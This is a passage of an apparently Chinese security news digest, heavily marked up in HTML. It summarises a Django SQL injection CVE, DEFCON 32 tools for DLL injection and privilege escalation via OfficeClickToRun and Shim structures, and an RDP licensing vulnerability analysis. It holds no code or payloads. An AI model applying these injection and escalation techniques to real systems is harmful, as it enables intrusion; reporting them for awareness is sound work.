	<p>🏷️: 网络安全, 工具, 内存抓取, lsass进程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0d
			 Django SQL 注入漏洞曝光</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GitHub 安全数据库披露了 Django 存在的 SQL 注入漏洞（CVE-2024-42005），影响 Django 版本 5.0 之前的 5.0.8 以及 4.2 之前的 4.2.15。该漏洞源于 QuerySet.values() 和 values_list() 方法在模型中包含 JSONField 时的处理不当，可通过传递包含恶意 JSON 对象密钥的参数来利用。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=432d2c2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTP95Qfcl2SpguMNwaKeaU9mNPHTUVxFmibcRUVKWNlcLnh2fQN1RGu7DQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Django QuerySet 方法存在 SQL 注入漏洞</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Django SQL 注入漏洞 CVE-2024-42005</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPqqekkxIAAnppCKu07Clb4JOKCmibGWxWdFvcTzmgHtLHGMfIDMHCfkw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPqqekkxIAAnppCKu07Clb4JOKCmibGWxWdFvcTzmgHtLHGMfIDMHCfkw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844185222881858"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Django 存在 SQL 注入漏洞：CVE-2024-42005 揭示了在某些版本的 Django 中，QuerySet.values() 和 values_list() 方法存在安全漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">影响版本范围：受影响的版本包括 Django 5.0 之前的 5.0.8 和 4.2 之前的 4.2.15。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞来源：漏洞是由于在模型中使用 JSONField 时，这些方法对传递的参数处理不当。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">修复措施：Django 已经发布了修复版本，分别是 5.0.8 和 4.2.15，以解决该问题。</section></li></ul>
	<br/>
	<p>🏷️: Django, SQL注入, 漏洞, GitHub, 安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0e
			 代码注入工具实现权限提升</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页提供了两种代码注入工具，分别用于通过OfficeClickToRun服务和Shim数据结构实现权限提升和无需注册新SDB文件即可注入DLL。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c52312ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPAVIQ5YFtrfMT1L5APQJlLggbYcncYVlttPkF06Kliamdt4oRSNTZVNg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DEFCON 32 演讲分享：工具源代码已公开</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DEFCON 32演讲分享工具源码公开</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPbNCJp3CXx4CqdqfbicwyO5a4ia8r5yicPwnOliaia8bHVRZr0ZSGUbCa86Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPbNCJp3CXx4CqdqfbicwyO5a4ia8r5yicPwnOliaia8bHVRZr0ZSGUbCa86Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855182444252421"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Office Injector 利用OfficeClickToRun服务的RPC方法，可以实现权限提升，将DLL注入到SYSTEM权限的进程中。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Shim Injector 通过内存中的Shim数据结构操作，实现了不依赖于SDB文件的DLL注入方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这些工具的使用可能涉及到安全风险，因为它们能够绕过正常的系统权限控制，进行代码注入。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">提到的技术和方法可能被用于恶意软件和攻击中，因此对于系统安全和恶意代码检测具有重要意义。</section></li></ul>
	<br/>
	<p>🏷️: 代码注入, 权限提升, OfficeClickToRun, Shim数据结构</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0f
			 Windows远程桌面许可服务漏洞分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要分析了Windows远程桌面许可证服务中的一个安全漏洞，并详细介绍了漏洞的原理、修复前后的代码差异，以及如何构造PoC来利用该漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7141025641025641" data-w="780" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=1bd1b4f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPfPNH3yicwia3zlv7uX8ia03ia7swibicSQsqJQO2ib6Adibo1W2gIedkcsFv1A%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.7113665389527458" data-w="783" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e338f83e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPIzsLWJiaiaAUQ3CoUZmhBbDHnE19nibDFk3BsicLhBTpttLEGoPYfrEPCw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8206039076376554" data-w="563" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=3dbc6210&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPL3N5q1teNxkBbU3lt1FlA1vH0tZZ9icVqQvop7R3hFjr6jk3gc6CTIg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
